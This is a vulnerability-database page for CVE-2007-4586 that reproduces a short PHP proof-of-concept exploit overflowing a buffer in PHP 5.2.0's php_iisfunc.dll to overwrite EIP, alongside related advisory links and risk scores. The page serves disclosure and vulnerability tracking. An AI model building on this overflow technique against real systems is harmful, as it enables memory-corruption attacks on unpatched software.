PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2007-4586 | 29 Aug 200701:00 | – | cve | |
| CVE-2007-4586 | 29 Aug 200701:00 | – | cvelist | |
| EUVD-2007-4568 | 7 Oct 202500:30 | – | euvd | |
| CVE-2007-4586 | 29 Aug 200701:17 | – | nvd | |
| PHP < 5.2.1 Multiple Vulnerabilities | 17 Aug 202000:00 | – | openvas | |
| PHP < 5.2.1 Multiple Vulnerabilities | 21 Jun 201200:00 | – | openvas | |
| PHP < 5.2.1 Multiple Vulnerabilities | 2 Apr 200700:00 | – | nessus | |
| Buffer overflow | 29 Aug 200701:17 | – | prion | |
| CVE-2007-4586 | 30 Oct 201510:17 | – | redhatcve |
<?php
// ==================================================================================
//
// php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
// Discovery: boecke <[email protected]>
// Risk: Local Buffer Overflow (Medium - High Risk)
// Notes: Various other functions are exploitable, all of which convert the
// string argument(s) to unicode.
//
// extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
// extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
// extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
// "Sangre, sonando, de rabia naci.. Who do you trust?"
// - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================
if ( !extension_loaded( "iisfunc" ) )
{
die( "Extension not loaded.\n" );
}
$buf_unicode = str_repeat( "A", 256 );
$eip_unicode = "\x41\x41";
iis_getservicestate( $buf_unicode . $eip_unicode );
?>
# milw0rm.com [2007-08-27]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.09446